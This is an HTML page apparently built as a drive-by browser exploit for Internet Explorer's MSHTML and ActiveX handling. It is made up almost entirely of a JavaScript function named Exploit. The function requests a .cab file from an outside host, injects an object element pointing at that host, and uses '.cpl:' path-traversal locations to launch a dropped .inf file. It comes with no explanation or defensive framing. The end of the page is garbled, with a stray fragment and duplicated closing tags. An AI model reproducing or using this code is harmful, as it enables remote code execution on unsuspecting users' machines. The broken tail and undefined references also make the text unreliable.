<!DOCTYPE html>
<html>
 <head>
  <meta http-equiv="Expires" content="-1">
  <meta http-equiv="X-UA-Compatible" content="IE=11">
 </head>
 <body>
 <script>
 
function Exploit() {

  var root = window;
  var CreateElement = root["Document"]["prototype"]["createElement"];
  var AppendChild = root["HTMLElement"]["prototype"]["appendChild"];
  var RemoveChild = root["HTMLElement"]["prototype"]["removeChild"];
  var iFrame = CreateElement["call"](root["document"], "iframe");
  try {
    AppendChild["call"](root["document"]["body"], iFrame);
  } catch (tempErrorVar) {
    AppendChild["call"](root["document"]["documentElement"], iFrame);
  }
  var ACTIVEX = iFrame["contentWindow"]["ActiveXObject"];
  var view = new ACTIVEX("htmlfile");
  iFrame["contentDocument"]["open"]()["close"]();
  try {
    RemoveChild["call"](root["document"]["body"], iFrame);
  } catch (_0x3b004e) {
    RemoveChild["call"](root["document"]["documentElement"], iFrame);
  }
  view["open"]()["close"]();
  var htmlInstance1 = new (view["script"]["ActiveXObject"])("htmlFile");
  htmlInstance1["open"]()["close"]();
  var htmlInstance2 = new (htmlInstance1["script"]["ActiveXObject"])("htmlFile");
  htmlInstance2["open"]()["close"]();
  var htmlInstance3 = new (htmlInstance2["Script"]["ActiveXObject"])("htmlFile");
  htmlInstance3["open"]()["close"]();
  var ActiveXObject1 = new ActiveXObject("htmlfile");
  var ActiveXObject2 = new ActiveXObject("htmlfile");
  var ActiveXObject3 = new ActiveXObject("htmlfile");
  var ActiveXObject4 = new ActiveXObject("htmlfile");
  var ActiveXObject5 = new ActiveXObject("htmlfile");
  var directiveProcessors = errors["prototype"]["open"];
  var nodeTypeRender = errors["prototype"]["send"];
  directiveProcessors["call"](root["XMLHttpRequest"], "GET", "http://totallynotavirus.wtf:999/hackmeplz.cab", ![]);
  nodeTypeRender["call"](root["XMLHttpRequest"]);
  htmlInstance3["script"]["document"]["write"]("<body>");
  var Object = CreateElement["call"](htmlInstance3["Script"]["document"], "object");
  Object["setAttribute"]("codebase", "http://totallynotavirus.wtf:999/hackme.cab#version=5,0,0,0");
  Object["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
  AppendChild["call"](htmlInstance3["script"]["document"]["body"], Object);
  ActiveXObject1["script"]["location"] = ".cpl:123";
  ActiveXObject1["script"]["location"] = ".cpl:123";
  ActiveXObject1["script"]["location"] = ".cpl:123";
  ActiveXObject1["script"]["location"] = ".cpl:123";
  ActiveXObject1["script"]["location"] = ".cpl:123";
  ActiveXObject1["script"]["location"] = ".cpl:123";
  ActiveXObject1["Script"]["location"] = ".cpl:123";
  ActiveXObject1["script"]["location"] = ".cpl:123";
  ActiveXObject1["script"]["location"] = ".cpl:123";
  ActiveXObject1["script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/gotcha.inf";
  ActiveXObject2["script"]["location"] = ".cpl:../../../AppData/Local/Temp/gotcha.inf";
  ActiveXObject3["script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/gotcha.inf";
  ActiveXObject4["script"]["location"] = ".cpl:../../../../AppData/Local/Temp/gotcha.inf";
  ActiveXObject5["script"]["location"] = ".cpl:../../../../../Temp/Low/gotcha.inf";
  ActiveXObject4["Script"]["location"] = ".cpl:../../../../../Temp/gotcha.inf";
  ActiveXObject4["script"]["location"] = ".cpl:../../Low/gotcha.inf";
  ActiveXObject4["script"]["location"] = ".cpl:../../gotcha.inf";
};

 </script>

  </body>
</html>mpionship.inf";
};

 </script>

  </body>
</html>